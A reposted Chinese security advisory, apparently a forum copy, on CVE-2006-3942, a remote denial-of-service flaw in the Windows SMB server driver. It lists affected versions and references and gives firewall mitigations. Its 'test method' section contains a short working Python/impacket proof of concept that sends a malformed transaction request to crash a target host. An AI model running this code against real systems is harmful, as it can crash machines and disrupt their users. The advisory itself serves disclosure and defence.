[转载]Microsoft Windows SMB畸形管道请求处理远程拒绝服务漏洞
信息来源:绿盟科技发布日期:2006-07-28
更新日期:2006-08-16
受影响系统:
Microsoft Windows XP SP2
Microsoft Windows XP SP1
Microsoft Windows XP
Microsoft Windows Server 2003 SP1
Microsoft Windows Server 2003
Microsoft Windows 2000SP4
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 19215
CVE(CAN) ID: CVE-2006-3942
Microsoft Windows是微软发布的非常流行的操作系统。
Windows的Server驱动(srv.sys)在处理某些SMB数据时存在空指针引用错误,远程攻击者可能利用此漏洞导致Windows系统崩溃死机。
如果远程攻击者向有漏洞的系统发送了包含有非正常终止的SMB_COM_TRANSACTION SMB消息(0x25)的话,就可能导致蓝屏死机。目前已有公开的攻击代码。
<*来源:Tom Cross
David Means
Scott Warfield
链接:[url]http://secunia.com/advisories/21276/print/[/url]
[url]http://xforce.iss.net/xforce/alerts/id/231[/url]
[url]http://xforce.iss.net/xforce/xfdb/27999[/url]
[url]http://blogs.technet.com/msrc/archive/2006/07/28/443837.aspx[/url]
[url]http://marc.theaimsgroup.com/?l=bugtraq&m=115568162330128&w=2[/url]
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
from impacket import smb
s = smb.SMB('*SMBSERVER','10.0.1.44')
s.login('','')
tid = s.tree_connect_andx(r'\\*SMBSERVER\IPC$')
s.send_trans(tid, '\x01\x00\x00\x00\x00\x00', 'cuchicuchi','','')
建议:
--------------------------------------------------------------------------------
临时解决方法:
* 在边界防火墙上阻断TCP端口139和445上的入站和出站通讯。
厂商补丁:
Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
[url]http://www.microsoft.com/technet/security/[/url]
页:
[1]